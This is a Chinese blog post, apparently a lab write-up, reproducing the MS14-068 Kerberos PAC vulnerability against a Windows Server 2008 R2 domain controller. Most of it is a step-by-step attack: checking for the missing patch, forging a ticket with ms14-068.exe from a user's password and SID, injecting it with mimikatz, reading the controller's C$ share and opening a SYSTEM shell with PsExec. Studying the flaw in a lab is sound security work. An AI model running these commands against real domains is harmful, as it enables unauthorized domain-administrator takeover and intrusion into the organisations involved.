MS14-068(域提权)漏洞复现

这里便用到了我们之前所讲到的 PAC 这个东西,PAC 是用来验证 Client 的访问权限的,它会被TGT 里发送给 Client,然后由 Client 发送给 TGS。但也恰恰是这个 PAC 造成了 MS14-068 这个漏洞。
该漏洞是位于 kdcsvc.dll 域控制器的密钥分发中心(KDC)服务中的 Windows 漏洞,它允许经过身份验证的用户在其获得的票证 TGT 中插入任意的 PAC 。普通用户可以通过呈现具有改变了 PAC 的 TGT 来伪造票据获得管理员权限

该漏洞在windows server2012环境的域控中可能会发生报错

环境信息

windows server2008 R2(域控):192.168.197.4
windows 7(成员机):192.168.197.133

查看本地主机信息

使用域内主机域内普通用户登录

net config workstation

image.png

查看域管主机信息
nltest /dsgetdc:

image.png

查看本地是否打补丁
systeminfo |find "3011780"

返回空证明没打补丁
image.png

本地访问测试
dir \\WIN-S50F8HMOEBD.dc1.com\c$

image.png

查看用户信息
whoami -user

image.png

使用ms14-068伪造票据:
ms14-068.exe -u test@dc1.com -p 123 -s S-1-5-21-3698873215-1888486255-1844816113-1107 -d WIN-S50F8HMOEBD.dc1.com

ms14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员 sid -d 域控制器地址
image.png
生成对应文件
image.png

使用mimikatz来清除和写入凭证
kerberos::purge			//清除凭证
kerberos::ptc  票据地址

image.png
image.png

再次链接后不会拒绝

dir \\WIN-S50F8HMOEBD.dc1.com\c$

image.png

反弹shell
PsExec64.exe /accepteula /s \\WIN-S50F8HMOEBD.dc1.com cmd

系统权限
image.png
域管IP
image.png

当域控是windows server2012时

会有以下拦截,不知道是什么情况
image.png

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值